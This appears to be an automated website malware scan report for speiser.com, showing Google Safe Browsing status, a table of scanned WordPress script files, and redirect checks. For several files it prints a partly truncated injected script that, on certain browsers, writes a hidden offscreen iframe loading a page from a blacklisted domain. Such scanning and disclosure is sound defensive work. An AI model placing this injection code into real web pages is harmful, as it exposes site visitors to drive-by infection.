Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=speiser.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.speiser.com/ | 200 OK Content-Length: 13978 Content-Type: text/html | clean |
http://www.speiser.com/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 94952 Content-Type: application/javascript | malicious |
Page code contains blacklisted domain: aflordi.belowstreetlevel.com /* Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/ */ function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://aflordi.belowstreetlevel.com/ififlasigaer16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe>');var r=new Date((new Date). ...[3216 bytes skipped]... Malicious iFrame found. size: 205x205 src: http://aflordi.belowstreetlevel.com/ififlasigaer16.html This URL is marked by Google as suspicious <iframe src="http://aflordi.belowstreetlevel.com/ififlasigaer16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"> | ||
http://www.speiser.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 1849 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: aflordi.belowstreetlevel.com function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://aflordi.belowstreetlevel.com/ififlasigaer16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe>');var r=new Date((new Date). ...[898 bytes skipped]... Decoded script: <iframe src="http://aflordi.belowstreetlevel.com/ififlasigaer16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe> Malicious iFrame found. size: 205x205 src: http://aflordi.belowstreetlevel.com/ififlasigaer16.html This URL is marked by Google as suspicious <iframe src="http://aflordi.belowstreetlevel.com/ififlasigaer16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"> | ||
http://www.qksz.net/1e-krgr | 200 OK Content-Length: 296 Content-Type: text/html | clean |
http://www.qksz.net/\"http://www.kqzyfj.com/click-5670831-10819454\" | 404 Not Found Content-Length: 50 Content-Type: image/gif | clean |
http://www.qksz.net/test404page.js | 404 Not Found Content-Length: 50 Content-Type: image/gif | clean |
http://www.kqzyfj.com/ao104o95vxz185yzBKQSTQTLU?target=_blank&mouseover=Y | 200 OK Content-Length: 1302 Content-Type: text/javascript | clean |
http://www.speiser.com/wp-content/themes/platformpro/sections/nav/superfish.js?ver=1.0 | 200 OK Content-Length: 4771 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: aflordi.belowstreetlevel.com function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://aflordi.belowstreetlevel.com/ififlasigaer16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe>');var r=new Date((new Date). ...[3936 bytes skipped]... Decoded script: <iframe src="http://aflordi.belowstreetlevel.com/ififlasigaer16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe> Malicious iFrame found. size: 205x205 src: http://aflordi.belowstreetlevel.com/ififlasigaer16.html This URL is marked by Google as suspicious <iframe src="http://aflordi.belowstreetlevel.com/ififlasigaer16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"> | ||
http://www.speiser.com/wp-content/themes/platformpro/sections/nav/jquery.bgiframe.min.js?ver=1.0 | 200 OK Content-Length: 2580 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: aflordi.belowstreetlevel.com function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://aflordi.belowstreetlevel.com/ififlasigaer16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe>');var r=new Date((new Date). ...[1319 bytes skipped]... Decoded script: <iframe src="http://aflordi.belowstreetlevel.com/ififlasigaer16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe> Malicious iFrame found. size: 205x205 src: http://aflordi.belowstreetlevel.com/ififlasigaer16.html This URL is marked by Google as suspicious <iframe src="http://aflordi.belowstreetlevel.com/ififlasigaer16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"> | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: speiser.com
Result:
GET / HTTP/1.1
Host: speiser.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: speiser.com
Referer: http://www.google.com/search?q=speiser.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: speiser.com
Referer: http://www.google.com/search?q=speiser.com
Result:
The result is similar to the first query. There are no suspicious redirects found.